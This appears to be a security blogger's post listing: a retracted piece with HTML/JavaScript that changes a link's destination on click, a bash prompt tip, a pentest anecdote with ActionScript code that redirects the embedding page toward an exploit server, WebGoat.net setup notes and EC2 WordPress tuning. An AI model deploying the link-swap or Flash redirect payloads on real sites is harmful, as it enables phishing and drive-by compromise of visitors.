Always “Hover” Before You Click!? Wrong.

RETRACTION: So, sometimes I am wrong. This attack does work, but it’s irrelevant, and here’s why: if someone has control of the DOM, the game is already over; there’s nothing the browser can do for you at that point, so it doesn’t really matter that the hover status can be spoofed. I’ll leave the post up so you can marvel at my stupidity, but to summarize: nothing to see here. (At least I’m not throwing banner ads at you.) Also, my apologies to those whose comments were here; when I moved off of WordPress I decided that a comment system wasn’t something I wanted to retain on my blog, and none of the existing comments were imported into the new site.
One of the things you hear frequently is to be aware of what you are clicking on when you surf: that you should “hover” over a link before clicking it to make sure it goes where you think it does. Hell, I’ve personally given this very advice to people who clicked on something stupid. I guess I’m a liar, because it isn’t true.

I put five minutes into thinking about this advice today, because something didn’t sit right with me about it. It took all of a minute to throw together some HTML and JavaScript that gets past it. Maybe everyone already knows this, and somehow I was asleep on the day it was covered in the hundreds of papers, articles, howtos, books, and presentations I’ve attended, read, or skimmed. Your browser will show you what the link is when you hover over it. But that doesn’t mean the link is the same by the time you have released your mouse click.
(onclick.html)
<!doctype html>
<html>
<head>
<script>
        // Swap the link's destination the moment it is clicked --
        // after any hover inspection has already happened.
        function tricked() {
                document.getElementById("naughty").href="http://www.frameloss.org";
        }
</script>
</head>
<body>
<a href="http://www.google.com" onclick="tricked()" id="naughty">www.google.com</a>
</body>
</html>
Honestly, I don’t know why this simple attack is allowed to work … browsers should not allow the href of a link to be modified from within its onclick handler. Want to see it in action? Here’s a link to the above code.

Yet Another Neat $PS1 Prompt for Bash

(With Google returning more than a million hits for the search “bash PS1”, it may be a little presumptuous to think I have anything to add to the conversation, but this was an interesting exercise for me, so I’ll share it anyways. Besides, this may actually be my most nitpicky *nix nerd post yet.) Here’s my brand new … super-duper space-saving, non-forking, color-changing PS1 prompt (that doesn’t mess up readline!):
export PS1='[\[\e[$(((($?>0))*31))m\]\h:\W\[\e[00m\]]\$ '
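The trick is the `$(((($?>0))*31))` term: bash arithmetic expansion turns the last exit status into either color code 31 (red) or 0 (terminal default) without forking anything. A quick sanity check of just that expression, using `true` and `false` as stand-ins for arbitrary commands:

```shell
# Arithmetic expansion is evaluated inside the shell itself, so no
# subshell is forked. ($?>0) is 1 after a failure, 0 after a success.
false
echo "color after failure: $(((($?>0))*31))"   # 31 -> red
true
echo "color after success: $(((($?>0))*31))"   # 0 -> terminal default
```

That number is then spliced into the `\e[...m` escape, so the hostname turns red whenever the previous command failed.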
I happened across a blog post (8 Useful and Interesting Bash Prompts) covering different PS1 prompts that people are using. The first prompt, “Show Happy face upon successful execution”, caught my attention because I write a lot of scripts, and many of those are used by other programs–so return codes are important, and not something I always remember to check. I hadn’t thought of it before, but I liked the idea! Anyways, it got me thinking about how it works … a lot of the fancy PS1 formulas you see out there run several commands (even if it isn’t obvious–generally if a bracket or backtick is involved, there’s a subshell forking out.) When your system is grinding to a halt, every fork counts, so I don’t like the idea of running an additional shell script every time I press enter. The example that Joshua Price provides, while really cool, adds extra forks every time you hit the return key. This is pretty easy to demonstrate using bash’s “set -x” command:
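The original trace output is easy to reproduce with a one-liner; `hostname` here is just a stand-in for whatever command a fancy prompt substitutes in:

```shell
# Each extra '+' in bash's xtrace output marks one level of (sub)shell
# nesting: the command substitution forks a subshell to run hostname.
bash -xc 'h=$(hostname)'
# stderr shows something like:
# ++ hostname
# + h=myhostname
```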

Each one of those “++” signs you see is a new process being created. I’m a bit of an efficiency freak, so I don’t like that. Curiosity got the better of me, and I decided to achieve the same end (return status indication within PS1) without a single forked process. So I went about modifying my (now previously) favorite PS1 prompt … the ultra-simple: Read full post →

Stored Cross-site Flashing?

The title for this post posed somewhat of a conundrum for me, because I think that, technically, cross-site flashing is about attacking a flash applet that already lives on a website. But what if you are allowed to add one to said website? Is attacking the document object model through an uploaded flash applet still cross-site flashing, is it stored cross-site scripting, or should it be called stored cross-site flashing? I’m sure there really is a definition somewhere that at least two people have agreed upon.

Anyways, I was looking at a web application that implemented pretty good cross-site scripting protection; it even uses the OWASP AntiSamy libraries to sanitize untrusted data stored in the application. But with all that work in place, it still allowed users to specify a location for a flash applet, though it didn’t allow the user to upload said applet to the server via the WYSIWYG editor I was attacking. I assume the developers thought this was sufficient to protect users, because it would cause the browser to enforce same-origin policies against the remote flash applet. (Not to mention someone could just point the object tag directly to a SWF file that started throwing exploits at Flash Player, cross-origin policy be damned.) There were, however, other places in the application that a user could upload to, even if not directly in the WYSIWYG editor. So referencing these other locations was a simple task: just paste in the URL!

I have theorized about using a similar attack vector for a while (because it’s pretty obvious.) Of course I realize this attack isn’t anything unique by any means, but I wasn’t able to find any easy steps to do it … ultimately my goal was to redirect to a metasploit autopwn instance and do a demo of how this could be used to compromise systems.
The best part was that the flash object tag was actually getting embedded in an iframe inside of the main page, which made all this look totally innocent to the browser getting attacked. So I compiled the following ActionScript 3 code using as3compile (from the swftools suite), and it worked perfectly!
(cross-site-flash.as)
package
{
        import flash.display.MovieClip;
        import flash.net.*;

        public class Main extends MovieClip
        {
                // On load, redirect the embedding page to the target URL.
                public function Main() {
                        var url:String = "CHANGE_TO_TARGET_URL";
                        var urlReq:URLRequest = new URLRequest(url);
                        navigateToURL(urlReq, "_self");
                }
        }
}

Installing WebGoat.net Using Apache on Ubuntu

At the recent OWASP SnowFROC conference in Denver, Jerry Hoff presented a new OWASP project called WebGoat.net, a .NET application designed for training classes. It is designed to run on Linux using the Apache web server, though you could probably also run it on nginx, or even IIS on Windows, if you were so inclined. I wanted to play with the application, and since setup instructions weren’t available on the site, I had to figure it out. It is really quite simple. The following are basic instructions on how to get it running on Ubuntu Server 12.
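Not to spoil the full write-up, but the core of it is Apache’s mod_mono module, which runs ASP.NET applications under Mono. A rough sketch of the packages involved on Ubuntu (the deploy path below is my placeholder, not an official location):

```shell
# Install Apache plus the Mono module that serves ASP.NET applications.
sudo apt-get install apache2 libapache2-mod-mono mono-apache-server4
# Drop the WebGoat.net files somewhere Apache can serve them,
# e.g. /var/www/webgoat (placeholder path), then restart Apache.
sudo service apache2 restart
```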

  Read full post →

Making WordPress Stable on EC2-Micro

EC2 Micro Instance Limitations

EC2 offers a lot of advantages over many web site hosting options. I am a bit of a control freak and like having full control over my web server. This has advantages and disadvantages, of course: more work, but more flexibility. Amazon offers a free EC2 micro instance for a year to new users, so it is a very attractive option for hosting a web site, and the micro instance is pretty cheap compared to the other system options that Amazon offers. But running a WordPress blog on a micro instance can be a serious challenge, and there are some caveats that may shock you after using it for a while. I have fought with getting my site to have a minimum level of stability, and here are some of my notes on what helped. There are a couple of major problems with using this option for hosting a website:
  • CPU usage restrictions: If you use 100% CPU for more than a few minutes, Amazon will “steal” CPU time from the instance, meaning that they throttle it. From my observations this can last as long as five minutes; then you get a few seconds of 100% again, and the restrictions are back. This will cripple your website, making it slow and even causing requests to time out.
  • Limited memory: The instance is limited to 613MB of RAM and does not have a swap partition. If you run out of memory, the system will panic and reboot.
Here is one symptom of CPU throttling from EC2, looking at the CPU usage from the “top” command:
According to the top man page: “st = steal (time given to other DomU instances)”
If you have more than 1000 visitors or so a day, a micro instance probably isn’t worth your time, but for many small sites (like mine) it does make sense. I wasn’t aware of these limitations before setting up my site, and I very quickly ran into reliability issues. You can save a lot of money by purchasing a reserved instance for a year, but my advice is to run for a few months before making the leap; if you find that your micro instance doesn’t cut it, you will have just thrown away a chunk of cash. So, let’s look at a few of the things you can do to make a WordPress site run reasonably well on a micro instance:
  • Configuration:
    • Tune Apache to run the correct number of threads.
    • Use the minimum required memory for MySQL.
    • Pre-cache your web pages.
    • Use a content distribution network (CDN) such as CloudFront.
    • Setup a swap partition.
    • Use a 32 bit operating system.
  • Reacting to site overload:
    • Configure alerting for CPU usage and network traffic.
    • Be ready to rent a larger instance if you get a big traffic spike.
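Of those, the swap space is the one that directly addresses the panic-and-reboot failure mode described above. A minimal sketch using a swap file rather than a partition (the path and the 1GB size are my own choices, not anything Amazon prescribes; run as root):

```shell
# Create and enable a 1GB swap file (micro instances ship with no swap).
dd if=/dev/zero of=/var/swapfile bs=1M count=1024
chmod 600 /var/swapfile      # swap files must not be world-readable
mkswap /var/swapfile
swapon /var/swapfile
# Make it survive reboots:
echo '/var/swapfile none swap sw 0 0' >> /etc/fstab
```

Swap on EBS-backed storage is slow, but slow beats a kernel panic when a traffic spike exhausts those 613MB.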

Read full post →